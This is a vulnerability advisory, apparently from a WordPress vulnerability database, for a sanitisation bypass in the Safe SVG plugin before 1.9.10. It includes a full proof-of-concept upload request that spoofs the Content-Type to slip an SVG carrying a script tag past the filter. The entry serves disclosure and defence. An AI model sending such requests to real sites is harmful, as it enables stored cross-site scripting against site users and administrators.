WordPress Plugin Vulnerabilities
Safe SVG < 1.9.10 - SVG Sanitisation Bypass
Description
The sanitisation step of the plugin can be bypassed by spoofing the content-type in the POST request to upload a file. Exploiting this vulnerability, an attacker will be able to perform the kinds of attacks that this plugin should prevent (mainly XSS, but depending on further use of uploaded SVG files potentially other XML attacks).
Proof of Concept
POST /wp-admin/async-upload.php HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------27451310545300823063986174174 Content-Length: 947 Connection: close Cookie: [user with upload capability] -----------------------------27451310545300823063986174174 Content-Disposition: form-data; name="name" xss.svg -----------------------------27451310545300823063986174174 Content-Disposition: form-data; name="action" upload-attachment -----------------------------27451310545300823063986174174 Content-Disposition: form-data; name="_wpnonce" b281e72731 -----------------------------27451310545300823063986174174 Content-Disposition: form-data; name="async-upload"; filename="xss.svg" Content-Type: image/png <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript">alert(/XSS/);</script> </svg> -----------------------------27451310545300823063986174174--
Affects Plugins
References
Miscellaneous
Original Researcher
David Hamann
Submitter
David Hamann
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-03-25 (about 2 years ago)
Added
2022-03-25 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)